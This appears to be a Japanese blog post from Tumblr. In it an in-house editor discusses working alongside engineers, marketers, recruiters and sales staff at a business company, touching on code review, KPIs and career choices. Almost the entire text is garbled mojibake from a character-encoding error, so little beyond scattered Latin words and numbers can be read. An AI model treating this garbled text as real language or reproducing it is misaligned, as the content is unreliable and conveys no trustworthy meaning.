¥ããŠãããŠãã ããã
ä»äºã§çŽæ¥é¢ããæ©äŒãå°ãªããããç·šéè
ãšãšã³ãžãã¢ã¯ãäºãã«ãè¬ã®äººããšããã€ã¡ãŒãžã匷ããã§ãããå®ã¯äžã€å
±éç¹ãããã®ã§ãã
ããšãã°ãWeb ç·šéè
ãããã°ãã¡ãã£ã¢ã®ã¡ãã£ãšããã«ã¹ã¿ãã€ãºãããããšãè² ã®éºç£ã§ãããªãã³ãŒããæžãããšããŸããããããšã³ãžãã¢ã®æ¹ã«èŠãããšããŸãã
ãããã¯ã²ã©ãã
圌ãã¯èŠç¬ããã ãã§ã觊ãã¬ç¥ã«ç¥ããªããšããæ
床ã決ã蟌ãã®ã§ãããããšã°ããã«å¯¿åžãå·®ãå
¥ãããŸãããã:sushi:
ããããŒããŒãªã
圌ãã¯èŠç¬ããªãããâã³ãŒãã¬ãã¥ãŒâ ã âãªãã¡ã¯ã¿ãªã³ã°â ãšããéæ³ã䜿ããŸãã ã³ãŒãã¬ãã¥ãŒãšã¯ã誀ããæ€åºã»ä¿®æ£ããããšãç®çãšããŠã³ãŒããæ»èªããããšããªãã¡ã¯ã¿ãªã³ã°ãšã¯ãåäœã®å
容ã¯å€ããã«å
éšæ§é ã ããããæãã«æŽãããšããä»äºã§ãã
ããããŸãã«ç·šéè
ãæ°äººã©ã€ã¿ãŒã«æœããŠãã âèµ€å
¥ãâ ãšäŒŒãŠããã®ã§ãããããããšãã§ãä»äºå
容ã£ãŠå®ã¯äŒŒãŠããšãããããã§ãããããšå®æããããšãã§ããŸãã
ãã ãç·šéè
ã誀åè±åãã€ã±ãŠãªãæ¥æ¬èªæç« ããã®ãŸãŸåºããŠããŸã£ããšããã§ãããããå²ç¬ãããããããã§ããããšã³ãžãã¢ã®ãã¹ã¯äºæ¥ã®æ»ã«çŽçµããŸãã æã
ã人éã§ããããšã¯ãŸãæ®å¿µãªããçãããã®ãªãäºå®ã§ãããããªãã®åšå²ã«ãããšã³ãžãã¢ãã¡ãç¥ã§ããããšããŸãäºå®ãªã®ã§ãã
ãå®ç§ã«ããªããŠåœç¶ããšããäžç芳ã§çããŠããŠãããããªããšãããŸããããš SNS ã§ãã€ããããã§ããªãããã é»ã
ãšé 匵ã£ãŠãã ãã£ãŠããç¥ã
ãªã®ã§ã絊æãé«ãã®ã¯åœããåã§ããééã£ãŠãã©ã€ã¿ãŒãããšã³ãžãã¢ãšåããããã®çµŠæãã»ããïŒããšãèšãåºããªãããã«æè²ããŸãããã
ããšãééã£ãŠããšã³ãžãã¢ã®åã§ãç·šéè
ãã©ã€ã¿ãŒã¯ 1 æååäœã§ãã ãã£ãŠãã²ãããªã«ã¿ã«ã挢åã®æ¯çãæ°ãã€ããŠããã§ãããšããã€ã£ãŠã¯ãããŸããã ãããªããšã¯ãããããããšããŠä»äºããã人éã§ããã°ã©ã®è·çš®ã§ãåœç¶ãã£ãŠãŸãããã³ãŒãã 1 è¡ã§ãçããããããåäœã 0.1 ç§ã§ã軜ãããããã«æ¥ã
é ãæ©ãŸããŠãããšã³ãžãã¢ãã¡ãªã©ã¯ãSlack ã®ãã©ã€ããŒããã£ã³ãã«ã§ããªãã倱ç¬ã®çã«ãããããããŸãã :trollface:
å®éã®ãšãããã»ãšãã©ã®ç·šéã»ã©ã€ã¿ãŒã¯ãšã³ãžãã¢ãšè·é¢ãçž®ããããšãã§ããã«å£ãæããŠããŸããŸãããšã³ãžãã¢ãšæ¥åžžçã«äŒè©±ããã«ã¯ãæã
ã«ã¯ããŸãã«ã âå
±éã®è©±é¡â ãå°ãªãã®ã§ãã
ãŸããã»ãšãã©ã®ãšã³ãžãã¢ã¯ãWeb ã¡ãã£ã¢ã衚瀺é床åäžãLP å¶äœãã¢ããã¯ã®ãããªåéã«ã¯ããŸãèå³ããªãã§ããããããã®ã¯ãã£ãš âé¢çœãããªããšâ ã§ãã
çãäžãããã¿ã¯ãæ°ããåºãããŒã«ã»ããã€ã¹ã»èšèªã®äœ¿ãåæããä»å¹Žåå ãã Advent Calendar ã®è©±ããphp ãããã«ã€ã±ãŠãªãããšãã話ããä»æã®ã¢ãã¡ã§ã©ããåã£ãããšãã話ããã€ã³ã¹ã¿ããã Slack ã§ãŠã±ã LGTM ç»åãããããªããšããã寿åžãé£ã¹ãã :sushi: ãšãã話ã§ããtumblr ã®ã«ã¹ã¿ãã€ãºãããã«ããã¥ããããšãã話ã¯ç§ãäžæ¹çã«ããŠãŸããããŸãçãäžãããŸããã
仲è¯ããªããšããããããããéçºè
æåã«ã©ã£ã·ã浞ããã®ã¿ã§ãããšã³ãžãã¢ã®ç¥ã
㯠âä»äººâ ãšã¯ããŸãé¢ãããªãåŸåããããŸãã
ã¡ãªã¿ã«ãããã³ããšã³ãã®ãšã³ãžãã¢ã¯ãã¶ã€ããŒã«è¿ãæãã§è¥å¹²ã¯ãªãšã€ã¿ãŒã£ãœããããã¯ãšã³ããã¢ããªç³»ã®ãšã³ãžãã¢ã¯å¯¡é»ã§è·äººæ°è³ªãšããåŸåããããŸãã人ã«ãã£ãŠã©ã£ã¡ã®ã»ããçžæ§ãããšããããããã
ããªãã®åšå²ã«ããåè·çš®ã®ã¡ã³ããŒãšã®æ¥ãæ¹ïŒããžãã¹ç³»éšçœ²ïŒ
ã€ã³ããŠã¹ã®ãšãã£ã¿ãŒã¯ãããžãã¹ç³»ã»éçºç³»ã©ã¡ãã®ç®¡èœã«å
¥ããã©ããã埮åŠãªãšããã§ãïŒç§ã¯ããžãã¹ç®¡èœãéçºç®¡èœãäž¡æ¹çµéšããã®ã§ïŒãäŒç€Ÿã«ãã£ãŠã¯ã»ãŒã«ã¹ãããŒã±ç³»ã®ãããŒãžã£ã®äžã ã£ãããçµå¶è
ã®äžã ã£ããã«ã€ãããšããããŸãã
ããã§ããã¡ãã®å³¶ã«è§Šããã«ããã£ãŠæ¹ããŠèšã£ãŠãããŸãããããªããå
¥ç€Ÿããã°ããã®æç¹ã§ã®ç€Ÿå
ã§ã¯ âããã³ã³ãã³ããã€ãã£ãŠãããããšâ ã â代衚ãã¹ã¿ããã®èšãããããšãæ±²ã¿åã£ãŠèšèªåããŠãããããšâ ãªã©ã¯ç¹ã«æ±ããããŠããŸããã æãæ±ããããã®ã¯ã売äžãäºæ¥ã®æé·ã«ã©ãã§è²¢ç®ããŠããã®ãããšããããããããå®æã§ãã
ããŒã±ã¿ãŒã»éçšç³»ãã£ã¬ã¯ã¿ãŒïŒåéšçœ²ã®ãããŒãžã£ãè¿ãïŒ
é è³ããã«æŽ»çšããŠæ°åããããããšãâ0â1â ãšãããã㯠â1â100â ãããã·ã§ã³ãšããŠãã人皮ã§ããèšäºéç£åã®ã¡ãã£ã¢ç·šéé·ã ã£ãããSEO æ
åœã ã£ãããåºåæ
åœã ã£ãããèªç€ŸãµãŒãã¹ã®ã°ããŒã¹ããã¯æ
åœã ã£ããæ¥åå
容ã¯ï¿œï¿œï¿œåºãã®ã§ããã人皮ãšããŠã¯çµæ§ãããããããšæã£ãŠããŸãã
åç䞻矩è
ãªã®ã§ãã¯ãªãšã€ãã£ããžã®ãã ããã¯äœããšãããããã¯ãªãªãã£ãé«ãäœããªã㊠KPI éæããŠããã©ããã§ãããªãã§ããããKPI éæã§ãããã®ãã¯ãªãªãã£é«ãã£ãŠããšã ãããšããå²ãåãæ¹ãããŠãã人ãå€ãã§ãã
ã€ãŸããããªãããããããµããªãïŒããšæããããªã¯ãªãšã€ãã£ããããããããµããšããããªããŠãããã§æ°åäžãã£ãŠãããããšæ®éã«éçšãããããã®ã§ãæèŠã¯è¡çªããããšããããŸãã
ã€ããããŒã±ã¿ãŒã®å
·äœäŸãšããŠã¯ãä»åã®ãç·šéè
ãã©ã€ã¿ãŒãç¥èŠãšãçŸç¶ãšããå
±æã§ãããšãããªãšããã£ãŠäœããŸããããšããã¢ããã³ãã«ã¬ã³ããŒã®äŒç»ã§ãandronaviç·šééšã玹ä»ïŒã¯ãªã¹ãã¹ã«ãããšåœ¹ç«ã€ããã¢ããªãã¹ããã°ããºããšãã宣äŒã§ãããªãèšäºãã¶ã£ããã§ãããããªããã©ã®ç®ãåãããŠæŽæ¿¯ããµã 108 åãããã€ããèžã§æ°æ¥é ãèžå€§äŒã«åºãããããªäººãšãã®ããšã§ãã圌ãã¯ããããªãããã¯ããã»ããããã£ããããæ°åãããããªããã€ã«ãšãããèšãããããªããããšãã軜ãããªã§ã¶ã£ããã§ããã®ã§ãç¹ã«æ·±ãèããŠãªããšæããŸãã
ïŒè¶
ããããããå®äŸãããããšãããããŸãïŒ
ããŒã±è·çš®ã¯åºæ¬çã«ãäžã€ã®äœæ¥ã«æéããããã®ã¯ç¡é§ããããããæ¡ãåºããŠãæé©ãªãã®ãæ€èšŒããŠããã»ããå¹ççããšããã¿ã€ããªã®ã§ãã¯ãªãšã€ãã£ãéšçœ²ã«æ¯ã¹ããšãããšèŠã§ã€ã±ãŠããã®ãäžãã£ãŠãã確çã¯äœãã§ãã
ããŸãä»ãåããã€ãŸãååšäŸ¡å€ãèªããŠãããããã«ã¯ãèæèŠã§ã®ã¯ãªãªãã£ã§äžåãã€ã€ããã£ããæ°åãåºãããšã ãã§ãã
ããŒã±ã¿ãŒã¯ããã仲è¯ããªã£ãŠãç§æ
ã¯æã¿ãŸãããããã圌ããèæèŠãšããŠããã®ã³ã³ãã³ããããªâŠããšæã£ããšããŠããæ°åãã€ããŠããªããã°è©äŸ¡ããã¥ããã§ãã
人äºã»æ¡çšæ
åœ
æ¡çšç³»ã³ã³ãã³ããå¶äœãããšãã«ã¯é£æºããè·çš®ã§ãã
æ¡çšç³»ã®è·çš®ã¯ãæ¬äººãããã¯ç¹ã«ãããŒãžã£ã¯ã©ã¹ãå¶æ¥çåºèº«ã§ããããšãå€ããããæ°è³ªçã«ã¯ã»ãŒã«ã¹å¯ãã§ãïŒãšã³ããªãŒæ°ãæ¡çšå䟡ã ãã§ãªã人æã®ã¬ãã«ãéèŠãããã®ã§ãã»ãŒã«ã¹ã»ã©çæçãªæ°åè³äžäž»çŸ©ã§ã¯ãªãæãã§ããïŒã
ç·šéã»ã©ã€ã¿ãŒãè²¢ç®ã§ãã âæ¯éå£åœ¢æâã»âé
åã¥ãâ ã®ãã§ãŒãºã«ãããŠã
ã¹ã«ãŠãã¡ãŒã«ã®éå°çã»è¿ä¿¡ç
æ±äººãžã®å¿åæ°ïŒäžæ¬¡éžèãžã®åå çïŒ
çŸå Žã¹ã¿ããã®é¢æ¥ã®ééçïŒå¿åè
ã®ã¹ããã¯ããããå
·åïŒ
æ¡çšç³»ã€ãã³ãã®åç¥ããŒãžããã³ SNS åç¥ã®åºåå¹æ
ãªã©ï¿œï¿œï¿œKGIïŒç¹å®è·çš®ãç¹å®äººæ°æ¡çšïŒéæã®ããã® KPI ã现ãããã§ãã¯ããäœå¶ãæŽããããã¡ã§ããããš âéä¿¡æ°â ã€ãŸã âã¢ã¯ã·ã§ã³æ°â ãšããè¡å KPI ã欲ããããã¡ã
å¶æ¥ãçµéšããŠããªãæ°åçãæãã®æ¡çšæ
åœè
ã¯ãåçŽã« âçŽ æµãªã³ã³ãã³ãâ ãã€ããããšã§ä»²è¯ãããŠãããããããŸãããã ãåé
ã§è§ŠããéããããŒãžã£ãšãªããšå®å
šã«å¥ã®äººçš®ãªã®ã§ãããŸãä»ãåãã«ã¯ãšã«ããèæèŠã§è¯ããšæãããã³ã³ãã³ããã€ããã€ã€ãåªç§ãªäººæããã®ãšã³ããªãŒãããéããããšã§ãã
æ¡çšã®ãããŒãžã£ã¯ã©ã¹ã«èªããããããšæã£ãããééã£ãŠãã瀟å¡ã€ã³ã¿ãã¥ãŒïŒ â¯â¯ããïŒãŸããå誰ãããïŒã®æ¥åžžã«å¯çâãã¿ãããªã¿ã€ãã«ã® THEã»èªå·±æºããã°ãšãæžããªãããã«ããŸããããã©ãã ãããã®ã©ã€ã¿ãŒãå·§ã¿ãªã€ã³ã¿ãã¥ãŒè¡ã§çŽ æŽãããåçš¿ã«ä»äžãããšããŠãããããèªãã®ã¯ããªããš â¯â¯ ããã®ãç¥ãåãã ãã§ãã
æ¡çšã®é åèªäœã幎ã
è¡ã®æµ·ã«ãªã£ãŠããããããŸã Web ããŒã±ãã£ã³ã°ãšããæŠå¿µãç解ããŸããããå
ããŒãã³ããŒãå
ããŒããªã©å€ãªçµæŽã®ç€Ÿå¡ã¯ã©ãã§ãããŸãããè·çš®ã®å£æ ¹ãè¶
ããã©ã³ãäŒã瀟å
å匷äŒã¯ã©ãã§ããã£ãŠãŸããã蚎æ±ã§ãããã€ã³ãã¯ãã¶ãããã§ã¯ãããŸãããããããããããé¢ããã»ããæ±è·è
ãŠã±ããã£ããããšãPR åŽããææ¡ããããããããªããšç«¶äºåãçãŸããŸããã
å¶æ¥ã»ã»ãŒã«ã¹ã³ã³ãµã«ãã£ã³ã°ã»ã¢ã«ãŠã³ããšã°ãŒã¯ãã£ã etc
ç·šéã»ã©ã€ã¿ãŒã«éããããšã³ãžãã¢ã»ãã¶ã€ããŒãåæ§ã«ããã£ãšãæã
ãå€ãããæŠäºãç¹°ãè¿ããŠãã人ãã¡ãäŒç€Ÿãææ¥ãåç¶ããããããâ0â1â ãã€ããã ã人ãã¡ã
çµè«ãšããŠãããããããªãã¿ã€ãã®ã»ãŒã«ã¹ãšã¯äžçåãããããŸããã ãäºãã«é¢ããã¡ãªããããªãã®ã§ãé¢ãããªããŠãããšæããŸãã
ãã¡ããå¿ç©ãããªã»ãŒã«ã¹ãããããããŸãããå¿ç©ããã«èŠããŠã圌ãã»åœŒå¥³ãã®å¿äžã¯ãWhy Writing PeopleïŒãã§ããµããŠããŸãã圌ãã¯ç·šéã»ã©ã€ã¿ãŒã®äŸ¡å€ãç解ããŠããã®ã§ã¯ãªã âææ
¢ããŠããâ ã âèããäœè£ããªãâ ã®ã ãšæã£ãŠãã ããã
èªããŠãããã«ã¯è¶
ã·ã³ãã«ã«ãèªåã®çºä¿¡åãšãã©ã³ãã§æ¡ä»¶ãåã£ãŠããããèšäºåºåã Web éçšã®æ¡ä»¶ã§é«ã売äžãéæããããšã§ãã
åŸè
ã§æ倧ã®åé¡ããå¶æ¥ãããããç£å»åŠçã¿ãããªæ¡ä»¶ãåã£ãŠãããäºæ¡ã§ããããšããããã¯èæ¯ãç解ããŸãããã
䞻㫠27 æ³ä»¥äžã®ãæããå€é
ããŸã§ããªããªåããŠãè¥æã®å€ãã¯ãã俺ãã¯å¿
æ»ã«é 匵ã£ãŠãŠæ絊 25ã30 äžãšããªã®ã«ã売äžããããŠãªããšã³ãžãã¢ãšãã©ã€ã¿ãŒã¯ãªãã§ãããªããã£ãŠãã®ïŒããåãã®çµŠæã©ã£ããåºãŠããšæã£ãŠãã®ïŒããšããçåãæ±ããŠããŸãïŒIT ãã³ãã£ãŒããããïŒã
ç¹ã« IT ãã³ãã£ãŒäŒæ¥ã«ãããããªã»ãŒã«ã¹ã¯ããéæã§ããªãã£ããçããŠã䟡å€ãªãããããšããç°å¢ã§è²ã£ããããããªäžåžã«å³ãããããããŠè²ã£ããšãããã¿ãŒã³ãå€ãã§ãã
ãããªããšãç·šéããã¶ã€ããŒãèŠåŽãããããããªãããããã®æ¡ä»¶ã¯èœã¡ã®ã»ããããã®ããªâŠããšèããäœè£ãªã©ãªããããŸãèªåã®ãã«ããéæããããšãäœããã倧äºããªã®ã§ãããããŠãäžè¬çã«ã¯ç¡åïŒIT æ¥çã§ã¯æåã ãšããŠãïŒã®äŒç€Ÿã§ãæããæ©ãŸã§ä»äºæŒ¬ãã®å¶æ¥ãšããä»äºãããæ倧ã®ã¡ãªããã¯ãæ©æïŒååæåäœïŒã®æ絊ã»ææ Œããªã®ã§ãåšå²ã«è¶³ãåŒã£åŒµãããŠèªåã®è©äŸ¡ãäžãããªãã®ã§ããã°ãã£ããšè»¢è·ããã»ãããã·ãªã®ã§ãã æ©ã¿å¯ããã©ããã¯ãŸã£ããå¥ã®åé¡ã§ãããå·éã«è©±ãåãããã«ãç解ã¯ããŠãããªããã°ãªããŸããã
ãããŠãã»ãŒã«ã¹ã®äžå
ãããã©ã³ç€Ÿå¡ã«ãæ°åãããªãäžçããããã§ããããšèªããããããšã¯ããåãã¡ãå¿
æ»ã§çãæããŠããçµéšã¯ä»äœã®åœ¹ã«ãç«ããªãããšããçºèšã«ãªããããªãããšããŸãç解ããŸãããã 圌ãã¯ãã®ãæ°åãéæããããããªãã£ããããšããæŠå Žã§ãã£ãšèº«äœãé
·äœ¿ããŠæŠããæã
ããäœèª¿æªããã§ãªã¢ãŒãã§åããŸãããšèšã£ãŠããæ¥ã客å
ã«èšªåããäžåžã«ãã¯ã©ã€ã¢ã³ãã«ãæ¿è©°ããããªããåå©ãæŽã¿åããä»ã®å°äœãç¯ãäžããŠããã®ã§ããæãããŠãããæé©ãªææ³ã ã£ãã®ããæ©ã¿å¯ããã©ãããªã©ã¯ãŸã£ããå¥ã®åé¡ã§ãã以äžåæã
ç§ã¯åºæ¬çã«ãå¶æ¥çãªäŸ¡å€èŠ³ãšããåãã俺ãã¡ãšåãèŠåŽãããããšããå調å§åã§ã¯ãªãšã€ã¿ãŒãã¡ãæ¯é
ããããšããè³çãã¡ã«åªã³ãããšã¯çµ¶å¯Ÿã«ãããŸããããã ãäžæ¹çã«è¢«å®³è
ã
ã©ããŠã»ãŒã«ã¹å
šäœã®æªå£ãèšãã ãã®ãªãã¡ãã£ãŠã¯ãªãšã€ã¿ãŒãèŠã€ãããåã蹎ãããŠããæ¡äŸã®å¶å®ãåèåžã«æ±ãã¯ãããã
ã€ããããšããã£ããã©ãç·šéè
ã»ã¯ãªãšã€ã¿ãŒéå£ããäºæ¥äŒç€Ÿã奜ãã§ã
ïŒããããšããæããšäžæ°ã«è±åæãåºãã®ãããã§ããïŒ
ç·šéè
ã»ã©ã€ã¿ãŒã¯ãã¡ããããã¶ã€ããŒãšããšã³ãžãã¢ã§ãããããŒããã£ã±ååãªã¹ãã«ãšãã©ãã¯ãŒæ°ãã€ããããã£ããšããªãŒã«ãªã£ãŠãªã¢ãŒãã§ããã¹ãã ãããæ£ç€Ÿå¡ãšãé± 5 æ¥ãªãã£ã¹ã«åºç€Ÿãšãä»æããµãããããšãèšãåºã茩ããšããããåŒã£å©ããŠãããæ¡äŸãšãåèåžãåºããŠãããªãããªãŒãšãæã£ãŠãããããã§ãïŒæ¹ããŠæšæ¶ïŒã
ã ãããå¶äœç³»ã®ä»äºã£ãŠãããªãŒã§ããããªä»äºãã£ãŠã人ã¯ã€ã±ãŠããã¿ãããªç©ºæ°ã«ãªããã¡ã§ãããããäºæ¥äŒç€Ÿã§åããããšããã人ã¯ã ãããèŠãããšããã§ããããâãªããé±ã« 1ã2 æ¥ãµããŒã£ãšç€Ÿå
ã«çŸããŠãäžäœäœã«è²¢ç®ããŠãã®ããŸã£ãããããããã©æã« 10ã20 äžãšãããã£ãŠããããèªç§°ã³ã³ãµã«ã¿ã³ãâ ãšããçç©ããäžéšãŸãã§åªç§ãªäººãããŸãããã ãããã¯âŠããïŒ
ãããã£ãŠé°å£ãå©ãããè¬ã®äººã«ãªããªãããã«ããäºæ¥äŒç€Ÿã§ãã£ã€ãåãã€ã³ããŠã¹ãšãã£ã¿ãŒçãªãã£ãªã¢ã«ã泚ç®ãéãŸãã°ãããªãšæã£ãŠããŸãã
SNS ã Web ã¡ãã£ã¢åäœã§ã§ããããšã«ã¯éçããããŸããèªåãæã蟌ãã çµå¶è
ã®åã«ãªã£ãŠãä»ã®è·çš®ã®ããããªäººãã¡ãšçµæããäžã€ã®äºæ¥ãæåããããšãã倧ããªç®æšïŒæ±ºããŠäžå ŽãŽãŒã«ãšãã§ã¯ãªãïŒã«åãã£ãŠãããšãã人çãé¢çœãã§ãã
ç·šéè
ã®ä»äºãã䟡å€ããæ
å ±ãèŠã€ããéããŠç·šã¿ãä»å 䟡å€ãã€ããŠãé«ã売ããããšã ãšããããããããªäººãããŠãããããã«èæ¯ããããçµå¶é£ã®äººçãåçž®ãããããªãµãŒãã¹ã»è£œåãããäºæ¥äŒç€Ÿãšããç°å¢ã¯ãå®ã«è
ã®ãµããããã®ãã âéã³å Žâ ã§ã¯ãªãã§ããããã
èå³ããã人ã¯ããã²äºæ¥äŒç€Ÿã«çªæããŠãã£ãŠã¿ãŠã»ãããªãšæã£ãŠããŸãããŸããŸãã®ç¢ºçã§å¿ã«äžçæ®ãå·ãè² ã£ãŠããŸããªã¹ã¯ããããŸãããç§ã¯ç·šããã§åããããšãªãããæ¯èŒã§ããªããã§ããã©ãäžå°èŠæš¡ã®äºæ¥äŒç€Ÿã¯éæ¥æãã£ãŠæ¥œãããã§ããã
1 note
·
View note